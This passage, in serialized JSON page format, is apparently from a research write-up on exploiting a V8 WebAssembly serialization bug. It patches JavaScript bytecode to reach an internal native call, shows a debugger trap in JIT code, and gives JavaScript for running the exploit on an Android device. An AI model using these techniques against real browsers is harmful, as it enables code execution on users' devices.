6,"props":139631,"children":139632},{"class":6922,"line":7557},[139633,139637,139641,139645,139649,139653,139657,139661,139665,139669,139673,139677,139681,139685,139689,139693,139697,139701,139705,139709,139713,139717,139721,139725,139729,139733,139737,139741,139745,139749,139753,139757,139761,139765,139769,139773,139777,139781,139785,139789,139793,139797,139801,139805,139809,139813,139817,139821,139825,139829,139833,139838,139842,139846],{"type":25,"tag":216,"props":139634,"children":139635},{"style":6989},[139636],{"type":31,"value":138129},{"type":25,"tag":216,"props":139638,"children":139639},{"style":6964},[139640],{"type":31,"value":7026},{"type":25,"tag":216,"props":139642,"children":139643},{"style":6989},[139644],{"type":31,"value":1882},{"type":25,"tag":216,"props":139646,"children":139647},{"style":6964},[139648],{"type":31,"value":7026},{"type":25,"tag":216,"props":139650,"children":139651},{"style":6989},[139652],{"type":31,"value":1882},{"type":25,"tag":216,"props":139654,"children":139655},{"style":6964},[139656],{"type":31,"value":7026},{"type":25,"tag":216,"props":139658,"children":139659},{"style":6989},[139660],{"type":31,"value":1882},{"type":25,"tag":216,"props":139662,"children":139663},{"style":6964},[139664],{"type":31,"value":7026},{"type":25,"tag":216,"props":139666,"children":139667},{"style":6989},[139668],{"type":31,"value":1882},{"type":25,"tag":216,"props":139670,"children":139671},{"style":6964},[139672],{"type":31,"value":7026},{"type":25,"tag":216,"props":139674,"children":139675},{"style":6989},[139676],{"type":31,"value":1882},{"type":25,"tag":216,"props":139678,"children":139679},{"style":6964},[139680],{"type":31,"value":7026},{"type":25,"tag":216,"props":139682,"children":139683},{"style":6989},[139684],{"type":31,"value":1882},{"type":25,"tag":216,"props":139686,"children":139687},{"style":6964},[139688],{"type":31,"value":7026},{"type":25,"tag":216,"props":139690,"children":139691},{"style":6989},[139692],{"type":31,"value":1882},{"type":25,"tag":216,"props":139694,"children":139695},{"style":6964},[139696],{"type":31,"value":7026},{"type":25,"tag":216,"props":139698,"children":139699},{"style":6989},[139700],{"type":31,"value":1882},{"type":25,"tag":216,"props":139702,"children":139703},{"style":6964},[139704],{"type":31,"value":7026},{"type":25,"tag":216,"props":139706,"children":139707},{"style":6989},[139708],{"type":31,"value":1882},{"type":25,"tag":216,"props":139710,"children":139711},{"style":6964},[139712],{"type":31,"value":7026},{"type":25,"tag":216,"props":139714,"children":139715},{"style":6989},[139716],{"type":31,"value":1882},{"type":25,"tag":216,"props":139718,"children":139719},{"style":6964},[139720],{"type":31,"value":7026},{"type":25,"tag":216,"props":139722,"children":139723},{"style":6989},[139724],{"type":31,"value":1882},{"type":25,"tag":216,"props":139726,"children":139727},{"style":6964},[139728],{"type":31,"value":7026},{"type":25,"tag":216,"props":139730,"children":139731},{"style":6989},[139732],{"type":31,"value":1882},{"type":25,"tag":216,"props":139734,"children":139735},{"style":6964},[139736],{"type":31,"value":7026},{"type":25,"tag":216,"props":139738,"children":139739},{"style":6989},[139740],{"type":31,"value":1882},{"type":25,"tag":216,"props":139742,"children":139743},{"style":6964},[139744],{"type":31,"value":7026},{"type":25,"tag":216,"props":139746,"children":139747},{"style":6989},[139748],{"type":31,"value":1882},{"type":25,"tag":216,"props":139750,"children":139751},{"style":6964},[139752],{"type":31,"value":7026},{"type":25,"tag":216,"props":139754,"children":139755},{"style":6989},[139756],{"type":31,"value":1882},{"type":25,"tag":216,"props":139758,"children":139759},{"style":6964},[139760],{"type":31,"value":7026},{"type":25,"tag":216,"props":139762,"children":139763},{"style":6989},[139764],{"type":31,"value":1882},{"type":25,"tag":216,"props":139766,"children":139767},{"style":6964},[139768],{"type":31,"value":7026},{"type":25,"tag":216,"props":139770,"children":139771},{"style":6989},[139772],{"type":31,"value":1882},{"type":25,"tag":216,"props":139774,"children":139775},{"style":6964},[139776],{"type":31,"value":7026},{"type":25,"tag":216,"props":139778,"children":139779},{"style":6989},[139780],{"type":31,"value":1882},{"type":25,"tag":216,"props":139782,"children":139783},{"style":6964},[139784],{"type":31,"value":7026},{"type":25,"tag":216,"props":139786,"children":139787},{"style":6989},[139788],{"type":31,"value":1882},{"type":25,"tag":216,"props":139790,"children":139791},{"style":6964},[139792],{"type":31,"value":7026},{"type":25,"tag":216,"props":139794,"children":139795},{"style":6989},[139796],{"type":31,"value":1882},{"type":25,"tag":216,"props":139798,"children":139799},{"style":6964},[139800],{"type":31,"value":7026},{"type":25,"tag":216,"props":139802,"children":139803},{"style":6989},[139804],{"type":31,"value":1882},{"type":25,"tag":216,"props":139806,"children":139807},{"style":6964},[139808],{"type":31,"value":7026},{"type":25,"tag":216,"props":139810,"children":139811},{"style":6989},[139812],{"type":31,"value":1882},{"type":25,"tag":216,"props":139814,"children":139815},{"style":6964},[139816],{"type":31,"value":7026},{"type":25,"tag":216,"props":139818,"children":139819},{"style":6989},[139820],{"type":31,"value":33383},{"type":25,"tag":216,"props":139822,"children":139823},{"style":6964},[139824],{"type":31,"value":7026},{"type":25,"tag":216,"props":139826,"children":139827},{"style":6989},[139828],{"type":31,"value":139381},{"type":25,"tag":216,"props":139830,"children":139831},{"style":6964},[139832],{"type":31,"value":7026},{"type":25,"tag":216,"props":139834,"children":139835},{"style":6989},[139836],{"type":31,"value":139837},"198",{"type":25,"tag":216,"props":139839,"children":139840},{"style":6964},[139841],{"type":31,"value":7026},{"type":25,"tag":216,"props":139843,"children":139844},{"style":6989},[139845],{"type":31,"value":1882},{"type":25,"tag":216,"props":139847,"children":139848},{"style":6964},[139849],{"type":31,"value":7465},{"type":25,"tag":216,"props":139851,"children":139852},{"class":6922,"line":7574},[139853],{"type":25,"tag":216,"props":139854,"children":139855},{"style":6964},[139856],{"type":31,"value":138416},{"type":25,"tag":216,"props":139858,"children":139859},{"class":6922,"line":7591},[139860,139864,139869,139873,139878,139882,139886,139890,139894,139898,139902],{"type":25,"tag":216,"props":139861,"children":139862},{"style":6936},[139863],{"type":31,"value":11807},{"type":25,"tag":216,"props":139865,"children":139866},{"style":6947},[139867],{"type":31,"value":139868}," r",{"type":25,"tag":216,"props":139870,"children":139871},{"style":6953},[139872],{"type":31,"value":6956},{"type":25,"tag":216,"props":139874,"children":139875},{"style":7047},[139876],{"type":31,"value":139877}," bug",{"type":25,"tag":216,"props":139879,"children":139880},{"style":6964},[139881],{"type":31,"value":1850},{"type":25,"tag":216,"props":139883,"children":139884},{"style":6947},[139885],{"type":31,"value":137747},{"type":25,"tag":216,"props":139887,"children":139888},{"style":6964},[139889],{"type":31,"value":7026},{"type":25,"tag":216,"props":139891,"children":139892},{"style":6947},[139893],{"type":31,"value":129074},{"type":25,"tag":216,"props":139895,"children":139896},{"style":6964},[139897],{"type":31,"value":179},{"type":25,"tag":216,"props":139899,"children":139900},{"style":6947},[139901],{"type":31,"value":129074},{"type":25,"tag":216,"props":139903,"children":139904},{"style":6964},[139905],{"type":31,"value":7797},{"type":25,"tag":216,"props":139907,"children":139908},{"class":6922,"line":7604},[139909,139914,139918,139922,139926,139930,139934,139938,139943,139947],{"type":25,"tag":216,"props":139910,"children":139911},{"style":6947},[139912],{"type":31,"value":139913},"  result",{"type":25,"tag":216,"props":139915,"children":139916},{"style":6953},[139917],{"type":31,"value":6956},{"type":25,"tag":216,"props":139919,"children":139920},{"style":6964},[139921],{"type":31,"value":7016},{"type":25,"tag":216,"props":139923,"children":139924},{"style":6973},[139925],{"type":31,"value":36878},{"type":25,"tag":216,"props":139927,"children":139928},{"style":6947},[139929],{"type":31,"value":139868},{"type":25,"tag":216,"props":139931,"children":139932},{"style":6964},[139933],{"type":31,"value":179},{"type":25,"tag":216,"props":139935,"children":139936},{"style":7047},[139937],{"type":31,"value":61533},{"type":25,"tag":216,"props":139939,"children":139940},{"style":6964},[139941],{"type":31,"value":139942},"()).",{"type":25,"tag":216,"props":139944,"children":139945},{"style":6947},[139946],{"type":31,"value":43115},{"type":25,"tag":216,"props":139948,"children":139949},{"style":6964},[139950],{"type":31,"value":6967},{"type":25,"tag":216,"props":139952,"children":139953},{"class":6922,"line":7613},[139954,139958,139963,139967,139971,139975,139979,139983,139987,139991],{"type":25,"tag":216,"props":139955,"children":139956},{"style":6936},[139957],{"type":31,"value":40151},{"type":25,"tag":216,"props":139959,"children":139960},{"style":6947},[139961],{"type":31,"value":139962}," wasm_instance",{"type":25,"tag":216,"props":139964,"children":139965},{"style":6953},[139966],{"type":31,"value":6956},{"type":25,"tag":216,"props":139968,"children":139969},{"style":6936},[139970],{"type":31,"value":35895},{"type":25,"tag":216,"props":139972,"children":139973},{"style":6947},[139974],{"type":31,"value":137730},{"type":25,"tag":216,"props":139976,"children":139977},{"style":6964},[139978],{"type":31,"value":179},{"type":25,"tag":216,"props":139980,"children":139981},{"style":7047},[139982],{"type":31,"value":137784},{"type":25,"tag":216,"props":139984,"children":139985},{"style":6964},[139986],{"type":31,"value":1850},{"type":25,"tag":216,"props":139988,"children":139989},{"style":6947},[139990],{"type":31,"value":13037},{"type":25,"tag":216,"props":139992,"children":139993},{"style":6964},[139994],{"type":31,"value":7797},{"type":25,"tag":216,"props":139996,"children":139997},{"class":6922,"line":7636},[139998,140002,140006,140010,140014,140018,140022,140026,140030],{"type":25,"tag":216,"props":139999,"children":140000},{"style":6936},[140001],{"type":31,"value":40151},{"type":25,"tag":216,"props":140003,"children":140004},{"style":6947},[140005],{"type":31,"value":36933},{"type":25,"tag":216,"props":140007,"children":140008},{"style":6953},[140009],{"type":31,"value":6956},{"type":25,"tag":216,"props":140011,"children":140012},{"style":6947},[140013],{"type":31,"value":139962},{"type":25,"tag":216,"props":140015,"children":140016},{"style":6964},[140017],{"type":31,"value":179},{"type":25,"tag":216,"props":140019,"children":140020},{"style":6947},[140021],{"type":31,"value":41849},{"type":25,"tag":216,"props":140023,"children":140024},{"style":6964},[140025],{"type":31,"value":179},{"type":25,"tag":216,"props":140027,"children":140028},{"style":6947},[140029],{"type":31,"value":137833},{"type":25,"tag":216,"props":140031,"children":140032},{"style":6964},[140033],{"type":31,"value":6967},{"type":25,"tag":216,"props":140035,"children":140036},{"class":6922,"line":7645},[140037,140042],{"type":25,"tag":216,"props":140038,"children":140039},{"style":7047},[140040],{"type":31,"value":140041},"  f",{"type":25,"tag":216,"props":140043,"children":140044},{"style":6964},[140045],{"type":31,"value":7633},{"type":25,"tag":216,"props":140047,"children":140048},{"class":6922,"line":7654},[140049],{"type":25,"tag":216,"props":140050,"children":140051},{"style":6964},[140052],{"type":31,"value":105943},{"type":25,"tag":38,"props":140054,"children":140055},{},[140056],{"type":31,"value":140057},"Running this in a debugger shows the expected breakpoint:",{"type":25,"tag":206,"props":140059,"children":140061},{"code":140060},"Thread 1 \"d8\" received signal SIGTRAP, Trace/breakpoint trap.\n0x00002ae46bfc1841 in ?? ()\n────────────────────────────────────────────────────────────────────────────\n   0x2ae46bfc183c                  add    BYTE PTR [rax], al\n   0x2ae46bfc183e                  add    BYTE PTR [rax], al\n   0x2ae46bfc1840                  int3\n → 0x2ae46bfc1841                  mov    rbp, rsp\n",[140062],{"type":25,"tag":82,"props":140063,"children":140064},{"__ignoreMap":7},[140065],{"type":31,"value":140060},{"type":25,"tag":606,"props":140067,"children":140069},{"id":140068},"porting-to-android",[140070],{"type":31,"value":140071},"Porting to Android",{"type":25,"tag":38,"props":140073,"children":140074},{},[140075,140077,140082,140084,140089,140091,140096,140098,140104],{"type":31,"value":140076},"The serialized x86-64 code can’t be used on the device because the architecture differs, and ",{"type":25,"tag":82,"props":140078,"children":140080},{"className":140079},[],[140081],{"type":31,"value":136862},{"type":31,"value":140083}," fails. We cross-compiled ",{"type":25,"tag":82,"props":140085,"children":140087},{"className":140086},[],[140088],{"type":31,"value":136021},{"type":31,"value":140090}," for arm64 and serialized the module there, but this still didn’t work on the device and ",{"type":25,"tag":82,"props":140092,"children":140094},{"className":140093},[],[140095],{"type":31,"value":136862},{"type":31,"value":140097}," returned ",{"type":25,"tag":82,"props":140099,"children":140101},{"className":140100},[],[140102],{"type":31,"value":140103},"undefined",{"type":31,"value":179},{"type":25,"tag":38,"props":140106,"children":140107},{},[140108,140110,140115,140117,140122],{"type":31,"value":140109},"Instead, we modified the bytecode to call ",{"type":25,"tag":82,"props":140111,"children":140113},{"className":140112},[],[140114],{"type":31,"value":136888},{"type":31,"value":140116}," directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls ",{"type":25,"tag":82,"props":140118,"children":140120},{"className":140119},[],[140121],{"type":31,"value":136862},{"type":31,"value":179},{"type":25,"tag":206,"props":140124,"children":140126},{"code":140125,"language":39578,"meta":7,"className":39576,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059301 - 1)}\n  a1 + 0x03027a6c;\n  throw 0x393e71a;\n} catch (e) {\n  console.log(\"foo\");\n  yield a16;\n}\n",[140127],{"type":25,"tag":82,"props":140128,"children":140129},{"__ignoreMap":7},[140130,140141,140185,140205,140221,140244,140271,140286],{"type":25,"tag":216,"props":140131,"children":140132},{"class":6922,"line":6923},[140133,140137],{"type":25,"tag":216,"props":140134,"children":140135},{"style":6973},[140136],{"type":31,"value":52300},{"type":25,"tag":216,"props":140138,"children":140139},{"style":6964},[140140],{"type":31,"value":7241},{"type":25,"tag":216,"props":140142,"children":140143},{"class":6922,"line":6769},[140144,140148,140152,140156,140160,140164,140168,140173,140177,140181],{"type":25,"tag":216,"props":140145,"children":140146},{"style":6947},[140147],{"type":31,"value":137129},{"type":25,"tag":216,"props":140149,"children":140150},{"style":6964},[140151],{"type":31,"value":80590},{"type":25,"tag":216,"props":140153,"children":140154},{"style":8205},[140155],{"type":31,"value":137138},{"type":25,"tag":216,"props":140157,"children":140158},{"style":6964},[140159],{"type":31,"value":179},{"type":25,"tag":216,"props":140161,"children":140162},{"style":7047},[140163],{"type":31,"value":137147},{"type":25,"tag":216,"props":140165,"children":140166},{"style":6964},[140167],{"type":31,"value":1850},{"type":25,"tag":216,"props":140169,"children":140170},{"style":6989},[140171],{"type":31,"value":140172},"0x059301",{"type":25,"tag":216,"props":140174,"children":140175},{"style":6953},[140176],{"type":31,"value":55224},{"type":25,"tag":216,"props":140178,"children":140179},{"style":6989},[140180],{"type":31,"value":8471},{"type":25,"tag":216,"props":140182,"children":140183},{"style":6964},[140184],{"type":31,"value":137169},{"type":25,"tag":216,"props":140186,"children":140187},{"class":6922,"line":6778},[140188,140192,140196,140201],{"type":25,"tag":216,"props":140189,"children":140190},{"style":6947},[140191],{"type":31,"value":137177},{"type":25,"tag":216,"props":140193,"children":140194},{"style":6953},[140195],{"type":31,"value":12858},{"type":25,"tag":216,"props":140197,"children":140198},{"style":6989},[140199],{"type":31,"value":140200}," 0x03027a6c",{"type":25,"tag":216,"props":140202,"children":140203},{"style":6964},[140204],{"type":31,"value":6967},{"type":25,"tag":216,"props":140206,"children":140207},{"class":6922,"line":7005},[140208,140212,140217],{"type":25,"tag":216,"props":140209,"children":140210},{"style":6973},[140211],{"type":31,"value":39165},{"type":25,"tag":216,"props":140213,"children":140214},{"style":6989},[140215],{"type":31,"value":140216}," 0x393e71a",{"type":25,"tag":216,"props":140218,"children":140219},{"style":6964},[140220],{"type":31,"value":6967},{"type":25,"tag":216,"props":140222,"children":140223},{"class":6922,"line":7110},[140224,140228,140232,140236,140240],{"type":25,"tag":216,"props":140225,"children":140226},{"style":6964},[140227],{"type":31,"value":50842},{"type":25,"tag":216,"props":140229,"children":140230},{"style":6973},[140231],{"type":31,"value":52380},{"type":25,"tag":216,"props":140233,"children":140234},{"style":6964},[140235],{"type":31,"value":7016},{"type":25,"tag":216,"props":140237,"children":140238},{"style":6947},[140239],{"type":31,"value":2399},{"type":25,"tag":216,"props":140241,"children":140242},{"style":6964},[140243],{"type":31,"value":18761},{"type":25,"tag":216,"props":140245,"children":140246},{"class":6922,"line":7216},[140247,140251,140255,140259,140263,140267],{"type":25,"tag":216,"props":140248,"children":140249},{"style":6947},[140250],{"type":31,"value":105902},{"type":25,"tag":216,"props":140252,"children":140253},{"style":6964},[140254],{"type":31,"value":179},{"type":25,"tag":216,"props":140256,"children":140257},{"style":7047},[140258],{"type":31,"value":105911},{"type":25,"tag":216,"props":140260,"children":140261},{"style":6964},[140262],{"type":31,"value":1850},{"type":25,"tag":216,"props":140264,"children":140265},{"style":8205},[140266],{"type":31,"value":137253},{"type":25,"tag":216,"props":140268,"children":140269},{"style":6964},[140270],{"type":31,"value":7797},{"type":25,"tag":216,"props":140272,"children":140273},{"class":6922,"line":7244},[140274,140278,140282],{"type":25,"tag":216,"props":140275,"children":140276},{"style":6973},[140277],{"type":31,"value":137265},{"type":25,"tag":216,"props":140279,"children":140280},{"style":6947},[140281],{"type":31,"value":137270},{"type":25,"tag":216,"props":140283,"children":140284},{"style":6964},[140285],{"type":31,"value":6967},{"type":25,"tag":216,"props":140287,"children":140288},{"class":6922,"line":7257},[140289],{"type":25,"tag":216,"props":140290,"children":140291},{"style":6964},[140292],{"type":31,"value":7874},{"type":25,"tag":38,"props":140294,"children":140295},{},[140296,140298,140304,140306,140312,140314,140320,140322,140327,140329,140335,140337,140342,140343,140349],{"type":31,"value":140297},"Here, ",{"type":25,"tag":82,"props":140299,"children":140301},{"className":140300},[],[140302],{"type":31,"value":140303},"a1 + 0x03027a6c",{"type":31,"value":140305}," generates the bytes ",{"type":25,"tag":82,"props":140307,"children":140309},{"className":140308},[],[140310],{"type":31,"value":140311},"01 4b 6c 7a 02 03",{"type":31,"value":140313},", where ",{"type":25,"tag":82,"props":140315,"children":140317},{"className":140316},[],[140318],{"type":31,"value":140319},"0x6c",{"type":31,"value":140321}," is the ",{"type":25,"tag":82,"props":140323,"children":140325},{"className":140324},[],[140326],{"type":31,"value":136846},{"type":31,"value":140328}," opcode, ",{"type":25,"tag":82,"props":140330,"children":140332},{"className":140331},[],[140333],{"type":31,"value":140334},"0x027a",{"type":31,"value":140336}," is the function ID of ",{"type":25,"tag":82,"props":140338,"children":140340},{"className":140339},[],[140341],{"type":31,"value":136888},{"type":31,"value":10439},{"type":25,"tag":82,"props":140344,"children":140346},{"className":140345},[],[140347],{"type":31,"value":140348},"0x03",{"type":31,"value":140350}," is the register index holding its first argument.",{"type":25,"tag":38,"props":140352,"children":140353},{},[140354,140356,140361,140362,140367,140369,140374],{"type":31,"value":140355},"Our earlier javascript snippet that serialized the wasm module used two native calls: ",{"type":25,"tag":82,"props":140357,"children":140359},{"className":140358},[],[140360],{"type":31,"value":136888},{"type":31,"value":1307},{"type":25,"tag":82,"props":140363,"children":140365},{"className":140364},[],[140366],{"type":31,"value":137856},{"type":31,"value":140368},". To avoid patching the bytecode again to invoke ",{"type":25,"tag":82,"props":140370,"children":140372},{"className":140371},[],[140373],{"type":31,"value":137856},{"type":31,"value":140375},", we can force Turbofan to compile the target function like this:",{"type":25,"tag":206,"props":140377,"children":140379},{"code":140378,"language":39578,"meta":7,"className":39576,"style":7},"// %WasmTierUpFunction(func);\nfor (let i = 0; i \u003C 0x100000; i++) {\n  func();\n}\n",[140380],{"type":25,"tag":82,"props":140381,"children":140382},{"__ignoreMap":7},[140383,140391,140451,140463],{"type":25,"tag":216,"props":140384,"children":140385},{"class":6922,"line":6923},[140386],{"type":25,"tag":216,"props":140387,"children":140388},{"style":6927},[140389],{"type":31,"value":140390},"// %WasmTierUpFunction(func);\n",{"type":25,"tag":216,"props":140392,"children":140393},{"class":6922,"line":6769},[140394,140398,140402,140406,140410,140414,140418,140422,140426,140430,140435,140439,140443,140447],{"type":25,"tag":216,"props":140395,"children":140396},{"style":6973},[140397],{"type":31,"value":7349},{"type":25,"tag":216,"props":140399,"children":140400},{"style":6964},[140401],{"type":31,"value":7016},{"type":25,"tag":216,"props":140403,"children":140404},{"style":6936},[140405],{"type":31,"value":15743},{"type":25,"tag":216,"props":140407,"children":140408},{"style":6947},[140409],{"type":31,"value":7354},{"type":25,"tag":216,"props":140411,"children":140412},{"style":6953},[140413],{"type":31,"value":6956},{"type":25,"tag":216,"props":140415,"children":140416},{"style":6989},[140417],{"type":31,"value":6992},{"type":25,"tag":216,"props":140419,"children":140420},{"style":6964},[140421],{"type":31,"value":21184},{"type":25,"tag":216,"props":140423,"children":140424},{"style":6947},[140425],{"type":31,"value":2289},{"type":25,"tag":216,"props":140427,"children":140428},{"style":6953},[140429],{"type":31,"value":12672},{"type":25,"tag":216,"props":140431,"children":140432},{"style":6989},[140433],{"type":31,"value":140434}," 0x100000",{"type":25,"tag":216,"props":140436,"children":140437},{"style":6964},[140438],{"type":31,"value":21184},{"type":25,"tag":216,"props":140440,"children":140441},{"style":6947},[140442],{"type":31,"value":2289},{"type":25,"tag":216,"props":140444,"children":140445},{"style":6953},[140446],{"type":31,"value":55238},{"type":25,"tag":216,"props":140448,"children":140449},{"style":6964},[140450],{"type":31,"value":18761},{"type":25,"tag":216,"props":140452,"children":140453},{"class":6922,"line":6778},[140454,140459],{"type":25,"tag":216,"props":140455,"children":140456},{"style":7047},[140457],{"type":31,"value":140458},"  func",{"type":25,"tag":216,"props":140460,"children":140461},{"style":6964},[140462],{"type":31,"value":7633},{"type":25,"tag":216,"props":140464,"children":140465},{"class":6922,"line":7005},[140466],{"type":25,"tag":216,"props":140467,"children":140468},{"style":6964},[140469],{"type":31,"value":7874},{"type":25,"tag":38,"props":140471,"children":140472},{},[140473],{"type":31,"value":140474},"Finally, running this code on the device:",{"type":25,"tag":206,"props":140476,"children":140478},{"code":140477,"language":39578,"meta":7,"className":39576,"style":7},"(async () => {\n  var wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  var mod = new WebAssembly.Module(wasm_code);\n  var inst = new WebAssembly.Instance(mod);\n  var func = inst.exports.shell;\n\n  // %WasmTierUpFunction(func);\n  for (let i = 0; i \u003C 0x100000; i++) {\n    func();\n  }\n\n  let r = bug(mod);\n  result = (await r.next()).value;\n  console.log(result);\n\n  let result_bytes = new Uint8Array(result);\n  console.log('[' + result_bytes.join(', ') + ']');\n})();\n",[140479],{"type":25,"tag":82,"props":140480,"children":140481},{"__ignoreMap":7},[140482,140505,140533,140752,140819,140826,140869,140912,140951,140958,140966,141026,141038,141045,141052,141083,141126,141153,141160,141196,141259],{"type":25,"tag":216,"props":140483,"children":140484},{"class":6922,"line":6923},[140485,140489,140493,140497,140501],{"type":25,"tag":216,"props":140486,"children":140487},{"style":6964},[140488],{"type":31,"value":1850},{"type":25,"tag":216,"props":140490,"children":140491},{"style":6936},[140492],{"type":31,"value":40108},{"type":25,"tag":216,"props":140494,"children":140495},{"style":6964},[140496],{"type":31,"value":43660},{"type":25,"tag":216,"props":140498,"children":140499},{"style":6936},[140500],{"type":31,"value":18779},{"type":25,"tag":216,"props":140502,"children":140503},{"style":6964},[140504],{"type":31,"value":7241},{"type":25,"tag":216,"props":140506,"children":140507},{"class":6922,"line":6769},[140508,140513,140517,140521,140525,140529],{"type":25,"tag":216,"props":140509,"children":140510},{"style":6936},[140511],{"type":31,"value":140512},"  var",{"type":25,"tag":216,"props":140514,"children":140515},{"style":6947},[140516],{"type":31,"value":137386},{"type":25,"tag":216,"props":140518,"children":140519},{"style":6953},[140520],{"type":31,"value":6956},{"type":25,"tag":216,"props":140522,"children":140523},{"style":6936},[140524],{"type":31,"value":35895},{"type":25,"tag":216,"props":140526,"children":140527},{"style":7047},[140528],{"type":31,"value":137399},{"type":25,"tag":216,"props":140530,"children":140531},{"style":6964},[140532],{"type":31,"value":137404},{"type":25,"tag":216,"props":140534,"children":140535},{"class":6922,"line":6778},[140536,140540,140544,140548,140552,140556,140560,140564,140568,140572,140576,140580,140584,140588,140592,140596,140600,140604,140608,140612,140616,140620,140624,140628,140632,140636,140640,140644,140648,140652,140656,140660,140664,140668,140672,140676,140680,140684,140688,140692,140696,140700,140704,140708,140712,140716,140720,140724,140728,140732,140736,140740,140744,140748],{"type":25,"tag":216,"props":140537,"children":140538},{"style":6989},[140539],{"type":31,"value":138129},{"type":25,"tag":216,"props":140541,"children":140542},{"style":6964},[140543],{"type":31,"value":7026},{"type":25,"tag":216,"props":140545,"children":140546},{"style":6989},[140547],{"type":31,"value":137421},{"type":25,"tag":216,"props":140549,"children":140550},{"style":6964},[140551],{"type":31,"value":7026},{"type":25,"tag":216,"props":140553,"children":140554},{"style":6989},[140555],{"type":31,"value":137430},{"type":25,"tag":216,"props":140557,"children":140558},{"style":6964},[140559],{"type":31,"value":7026},{"type":25,"tag":216,"props":140561,"children":140562},{"style":6989},[140563],{"type":31,"value":137439},{"type":25,"tag":216,"props":140565,"children":140566},{"style":6964},[140567],{"type":31,"value":7026},{"type":25,"tag":216,"props":140569,"children":140570},{"style":6989},[140571],{"type":31,"value":184},{"type":25,"tag":216,"props":140573,"children":140574},{"style":6964},[140575],{"type":31,"value":7026},{"type":25,"tag":216,"props":140577,"children":140578},{"style":6989},[140579],{"type":31,"value":1882},{"type":25,"tag":216,"props":140581,"children":140582},{"style":6964},[140583],{"type":31,"value":7026},{"type":25,"tag":216,"props":140585,"children":140586},{"style":6989},[140587],{"type":31,"value":1882},{"type":25,"tag":216,"props":140589,"children":140590},{"style":6964},[140591],{"type":31,"value":7026},{"type":25,"tag":216,"props":140593,"children":140594},{"style":6989},[140595],{"type":31,"value":1882},{"type":25,"tag":216,"props":140597,"children":140598},{"style":6964},[140599],{"type":31,"value":7026},{"type":25,"tag":216,"props":140601,"children":140602},{"style":6989},[140603],{"type":31,"value":184},{"type":25,"tag":216,"props":140605,"children":140606},{"style":6964},[140607],{"type":31,"value":7026},{"type":25,"tag":216,"props":140609,"children":140610},{"style":6989},[140611],{"type":31,"value":21486},{"type":25,"tag":216,"props":140613,"children":140614},{"style":6964},[140615],{"type":31,"value":7026},{"type":25,"tag":216,"props":140617,"children":140618},{"style":6989},[140619],{"type":31,"value":184},{"type":25,"tag":216,"props":140621,"children":140622},{"style":6964},[140623],{"type":31,"value":7026},{"type":25,"tag":216,"props":140625,"children":140626},{"style":6989},[140627],{"type":31,"value":137504},{"type":25,"tag":216,"props":140629,"children":140630},{"style":6964},[140631],{"type":31,"value":7026},{"type":25,"tag":216,"props":140633,"children":140634},{"style":6989},[140635],{"type":31,"value":1882},{"type":25,"tag":216,"props":140637,"children":140638},{"style":6964},[140639],{"type":31,"value":7026},{"type":25,"tag":216,"props":140641,"children":140642},{"style":6989},[140643],{"type":31,"value":1882},{"type":25,"tag":216,"props":140645,"children":140646},{"style":6964},[140647],{"type":31,"value":7026},{"type":25,"tag":216,"props":140649,"children":140650},{"style":6989},[140651],{"type":31,"value":21253},{"type":25,"tag":216,"props":140653,"children":140654},{"style":6964},[140655],{"type":31,"value":7026},{"type":25,"tag":216,"props":140657,"children":140658},{"style":6989},[140659],{"type":31,"value":331},{"type":25,"tag":216,"props":140661,"children":140662},{"style":6964},[140663],{"type":31,"value":7026},{"type":25,"tag":216,"props":140665,"children":140666},{"style":6989},[140667],{"type":31,"value":184},{"type":25,"tag":216,"props":140669,"children":140670},{"style":6964},[140671],{"type":31,"value":7026},{"type":25,"tag":216,"props":140673,"children":140674},{"style":6989},[140675],{"type":31,"value":1882},{"type":25,"tag":216,"props":140677,"children":140678},{"style":6964},[140679],{"type":31,"value":7026},{"type":25,"tag":216,"props":140681,"children":140682},{"style":6989},[140683],{"type":31,"value":58639},{"type":25,"tag":216,"props":140685,"children":140686},{"style":6964},[140687],{"type":31,"value":7026},{"type":25,"tag":216,"props":140689,"children":140690},{"style":6989},[140691],{"type":31,"value":59854},{"type":25,"tag":216,"props":140693,"children":140694},{"style":6964},[140695],{"type":31,"value":7026},{"type":25,"tag":216,"props":140697,"children":140698},{"style":6989},[140699],{"type":31,"value":184},{"type":25,"tag":216,"props":140701,"children":140702},{"style":6964},[140703],{"type":31,"value":7026},{"type":25,"tag":216,"props":140705,"children":140706},{"style":6989},[140707],{"type":31,"value":22067},{"type":25,"tag":216,"props":140709,"children":140710},{"style":6964},[140711],{"type":31,"value":7026},{"type":25,"tag":216,"props":140713,"children":140714},{"style":6989},[140715],{"type":31,"value":137430},{"type":25,"tag":216,"props":140717,"children":140718},{"style":6964},[140719],{"type":31,"value":7026},{"type":25,"tag":216,"props":140721,"children":140722},{"style":6989},[140723],{"type":31,"value":137601},{"type":25,"tag":216,"props":140725,"children":140726},{"style":6964},[140727],{"type":31,"value":7026},{"type":25,"tag":216,"props":140729,"children":140730},{"style":6989},[140731],{"type":31,"value":137610},{"type":25,"tag":216,"props":140733,"children":140734},{"style":6964},[140735],{"type":31,"value":7026},{"type":25,"tag":216,"props":140737,"children":140738},{"style":6989},[140739],{"type":31,"value":137619},{"type":25,"tag":216,"props":140741,"children":140742},{"style":6964},[140743],{"type":31,"value":7026},{"type":25,"tag":216,"props":140745,"children":140746},{"style":6989},[140747],{"type":31,"value":137619},{"type":25,"tag":216,"props":140749,"children":140750},{"style":6964},[140751],{"type":31,"value":7465},{"type":25,"tag":216,"props":140753,"children":140754},{"class":6922,"line":7005},[140755,140759,140763,140767,140771,140775,140779,140783,140787,140791,140795,140799,140803,140807,140811,140815],{"type":25,"tag":216,"props":140756,"children":140757},{"style":6989},[140758],{"type":31,"value":138129},{"type":25,"tag":216,"props":140760,"children":140761},{"style":6964},[140762],{"type":31,"value":7026},{"type":25,"tag":216,"props":140764,"children":140765},{"style":6989},[140766],{"type":31,"value":1882},{"type":25,"tag":216,"props":140768,"children":140769},{"style":6964},[140770],{"type":31,"value":7026},{"type":25,"tag":216,"props":140772,"children":140773},{"style":6989},[140774],{"type":31,"value":93224},{"type":25,"tag":216,"props":140776,"children":140777},{"style":6964},[140778],{"type":31,"value":7026},{"type":25,"tag":216,"props":140780,"children":140781},{"style":6989},[140782],{"type":31,"value":21486},{"type":25,"tag"